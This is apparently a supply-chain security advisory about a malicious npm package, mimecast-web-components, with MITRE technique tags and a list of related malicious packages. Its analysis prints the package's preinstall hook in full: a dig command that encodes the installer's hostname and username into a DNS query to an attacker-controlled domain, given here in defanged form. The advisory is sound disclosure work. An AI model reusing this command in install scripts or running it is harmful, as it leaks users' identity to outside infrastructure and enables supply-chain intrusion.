mimecast-web-components@2.0.0
Malicious code in mimecast-web-components (npm)
T1059 · Command and Scripting InterpreterT1082 · System Information DiscoveryT1071.004 · DNST1041 · Exfiltration Over C2 Channel
Analysis
mimecast-web-components is a combosquat dummy package whose preinstall hook performs DNS-based host-fingerprint exfiltration: it runs dig +short "$(echo c-$(hostname)-$(whoami) | base32 | tr -d '=' | rev).canary[.]rebind[.]fun[.]offensive[.]work", encoding the victim's hostname and username into a subdomain query to an attacker-controlled DNS endpoint. The index.js is a 5-line dummy stub disguising the package as combosquat prevention. The DNS exfiltration is a recon beacon that leaks installer identity to the attacker's infrastructure.
- analyzed by
- Leitwacht
- first seen
- Jun 10, 2026, 05:32 PM
- analyzed
- Jun 10, 2026, 05:32 PM
Related advisories
- @nf-addons/am-global-header@9.9.10
- @insiderintelligence/componentlibrary@9.9.10
- @tvg-mar/promos-context@9.9.10
- @tesla-insurance/vinless-quote@9.9.10
- test899-auth@1.0.1
- test89-auth@1.0.1
- @tink/tink-link-core@9.9.10
- test89078-auth@99.99.99
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.